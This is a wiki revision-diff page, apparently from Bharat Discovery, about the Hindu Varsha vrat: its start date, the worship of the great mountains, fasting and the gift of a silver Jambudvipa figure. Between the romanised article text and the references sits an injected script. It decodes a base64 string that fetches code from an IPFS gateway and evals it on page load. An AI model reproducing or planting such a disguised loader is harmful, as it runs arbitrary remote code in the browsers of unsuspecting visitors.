Difference between revisions of "वर्ष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
Line 2: Line 2:
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[नवमी]] से आरम्भ करना चाहिए।
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[नवमी]] से आरम्भ करना चाहिए।
 
*[[हिमालय]], हेमकूट, श्रंगवान, मेरु, मलयवान, गंधमादन नामक बड़े पर्वतों की पूजा करनी चाहिए। उस दिन उपवास करना चाहिए।
 
*[[हिमालय]], हेमकूट, श्रंगवान, मेरु, मलयवान, गंधमादन नामक बड़े पर्वतों की पूजा करनी चाहिए। उस दिन उपवास करना चाहिए।
*व्रत के अन्त में जम्बूद्वीप की रजत आकृति का दान करना चाहिए। इनमें<ref>हेमाद्रि (व्रतखण्ड 1, 959, विष्णुधर्मोत्तरपुराण से उद्धरण)। [[ब्रह्मपुराण]] (18|16), [[मत्स्यपुराण]] (113|10-12) एवं [[वायुपुराण]] (1|8)</ref> हिमालय, हेमकूट आदि को वर्षपर्वत की संज्ञा दी गयी है।  
+
*व्रत के अन्त में जम्बूद्वीप की रजत आकृति का दान करना चाहिए। इनमें<ref>हेमाद्रि (व्रतखण्ड 1, 959, विष्णुधर्मोत्तरपुराण से उद्धरण)। [[ब्रह्मपुराण]] (18|16), [[मत्स्यपुराण]] (113|10-12) एवं [[वायुपुराण]] (1|8</ref> हिमालय, हेमकूट आदि को वर्षपर्वत की संज्ञा दी गयी है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat chaitr shukl paksh ki navami se arambh karana chahie.
  • himalay, hemakoot, shrangavan, meru, malayavan, gandhamadan namak b de parvatoan ki pooja karani chahie. us din upavas karana chahie.
  • vrat ke ant mean jamboodvip ki rajat akriti ka dan karana chahie. inamean[1] himalay, hemakoot adi ko varshaparvat ki sanjna di gayi hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 959, vishnudharmottarapuran se uddharan). brahmapuran (18|16), matsyapuran (113|10-12) evan vayupuran (1|8

sanbandhit lekh